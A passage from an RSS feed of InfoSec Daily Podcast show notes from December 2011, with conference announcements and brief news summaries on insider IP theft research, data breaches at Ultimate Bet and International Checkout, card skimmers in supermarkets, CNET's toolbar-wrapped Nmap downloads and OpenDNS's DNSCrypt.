<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a new report commissioned by Symantec, &ldquo;</span><a href="http://www.symantec.com/content/en/us/about/media/pdfs/symc_malicious_insider_whitepaper_Dec_2011.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Behavioral Risk Indicators of Malicious Insider Theft of Intellectual Property: Misreading the Writing on the Wall</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,&rdquo; Shaw and Stock analyzed insider breaches to get a sense of not only how insiders steal data, but who does it and why. Among their findings:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; Roughly 65% of insiders who steal intellectual property had already accepted positions with a competing company &#8211; or started their own &#8211; at the time of the theft.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; People typically steal information they are authorized to access. According to their data, 75% of insiders stole material they were authorized to see.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; The average insider IP theft is committed by a male employee about 37 years old who serves in a technical position such as an engineer, scientist or programmer. In addition, the majority of IP thieves had signed IP agreements, indicating that policies alone are often ineffective.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&bull;&nbsp;&nbsp;&nbsp; IP theft by insiders is often precipitated by professional setbacks. With many IP thieves, there is a sense of disgruntlement with the organization.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Organizations need to take a multi-disciplinary approach to dealing with insider threats that involves creating a team that includes not only IT security, but human resources and physical security as well, Shaw said. Silos in an organization can make it difficult to understand whether or not they are at risk, he added.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3245/0/infosec-daily-podcast-episode-540.mp3" length="20788582" type="audio/mpeg" />
		<itunes:duration>0:42:50</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	ISC2 Offical Results: @WIMREMES WINS!
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611
&#160;
Customers of the online poker Website Ultimate Bet (UB) are the victims of a data breach that spilled the private information of up to 3.5 million of its customers online over the weekend.
&#160;
Ultimate Bet, a property of the Cereus Poker Network, saw a slew of customer information posted online including players&#39; names, screen names, birth dates, e-mail addresses, phone numbers and mailing and IP addresses. Users&#8217; UB account numbers were also found online in addition to their VIP, Affiliate and Blacklist statuses, all which are unique to the site. Customers&#8217; credit card numbers and social security numbers don&#8217;t appear to have been leaked in this particular incident.
&#160;
According to a report on PokerNewsDaily.com, the information was initially posted on the Two Plus Two poker strategy forums and taken offline shortly after. Even though it was only available for a short period, the information was quickly copied and distributed across various online mediums.
&#160;
Source: &#160;http://arstechnica.com/business/news/2011/12/hackers-hit-supermarket-self-checkout-lanes-steal-money-from-shoppers.ars
&#160;
Criminals have tampered with the credit and debit card readers at self-checkout lanes in more than 20 supermarkets operated by a California chain, allowing them to steal money from shoppers who used the compromised machines. The chain, Lucky Supermarkets, which is owned by Save Mart, is now inspecting the rest of its 234 stores in northern California and northern Nevada and urging customers who used self-checkout lanes to close their bank and credit card accounts.
&#160;
Lucky Supermarkets issued a consumer advisory Monday listing the stores confirmed to have been affected, wh[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 539 &#8211; Nmap Malware, DNSCrypt, International Checkout, GCHQ, India Facebook &amp; Steam</title>
		<link>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam</link>
		<comments>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam#comments</comments>
		<pubDate>Wed, 07 Dec 2011 02:02:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3239</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 539 for December 6, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cnet has come under fire for wrapping downloads of the popular Nmap network analysis tool and other open-source software packages with a toolbar of dubious utility.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nmap is a popular open-source network auditing and penetration-testing tool that allows sysadmins to run network troubleshooting and penetration tests. Over the last few days, users who have downloaded the tool from Cnet popular download.com site have been, by default, offered it in conjunction with the Babylon Toolbar.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sysadmins can opt out of receiving the toolbar, which changes their browsing experience, home page and default search engines, but they are clearly directed towards accepting the software, as a blog post by</span><a href="http://nakedsecurity.sophos.com/2011/12/06/popular-security-tool-nmap-at-the-middle-of-a-security-brouhaha/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sophos</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> illustrates.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gordon Lyon (Fyodor), the developer of Nmap, has cried foul over the way the toolbar has been pushed, objecting in a</span><a href="http://seclists.org/nanog/2011/Dec/160"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to the North American Network Operators&#39; Group (Nanog) mailing list (extract below).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lyon added that consumers downloading VLC, the popular open-source media player software, are also being offered the Babylon toolbar, via what he described as a a &quot;Trojan installer&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OpenDNS announced a technology preview today for Macs running their DNS services called DNSCrypt. Think of this as doing for the DNS protocol what HTTPS does for the Web protocols. Like its mainline service, it is freely available, and Windows and Linux versions are promised for next year. You can</span><a href="http://www.opendns.com/technology/dnscrypt/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">download the code here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for the Mac OS. They will eventually post all of their code on GitHub for public scrutiny.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSCrypt solves one critical flaw in the DNS process: the ability to snoop as a &quot;man in the middle&quot; of a conversation between two computers, because it encrypts all DNS traffic between your computer and the Internet. This is a real concern, and there have been several exploits lately that took advantage of DNS requests, because the vast majority of them are issued in the clear. (Just like most emails.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The version of DNSCrypt that is available is a &quot;preview&quot; meaning that it could have problems in daily use. We haven&#39;t yet tried it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSCrypt isn&#39;t the only game in town, and for years an effort called DNSSEC has been trying to take hold for increased DNS security. DNSSEC solves a larger problem: not only does it provided an encrypted channel, but also adds authentication and a chain of trust to ensure that the expected DNS record hasn&#39;t been tampered with. They can be used together. Sadly, few sites have implemented it to date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.softpedia.com/news/International-Checkout-Hacker-Customer-Credit-Cards-Abused-238650.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/International-Checkout-Hacker-Customer-Credit-Cards-Abused-238650.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">International Checkout customers began receiving emails that alert them on the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;International Checkout was recently the victim of a system intruder who was able to access encrypted credit card information,&rdquo; reads the email provided by</span><a href="http://msmvps.com/blogs/spywaresucks/archive/2011/12/06/1803282.aspx?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+SpywareSucks+%28Spyware+Sucks%29&amp;utm_content=Google+Reader"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> SpywareSucks</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;You are receiving this email from International Checkout because your credit card information was in the database which was compromised.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems as the breach was discovered sometime in mid-September and an investigation has immediately commenced. Besides the fact that the authorities were notified of the issue, the credit card information from the databases was removed to make sure no one still had access.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even though the information was encrypted, the attacker managed to obtain the encryption key that was stored in a separate location.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As a precaution, International Checkout is providing notification to people whose information may have been in the database that was accessed so that if it turns out the information was compromised in any way, they can take the appropriate measures to protect themselves,&rdquo; the notification adds.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2011/12/06/hidden_gchq_code_breaking_challenge/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/06/hidden_gchq_code_breaking_challenge/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Codebreakers are split over whether there might be a hidden challenge in the GCHQ-set code-breaking puzzle set last week.</span></p>
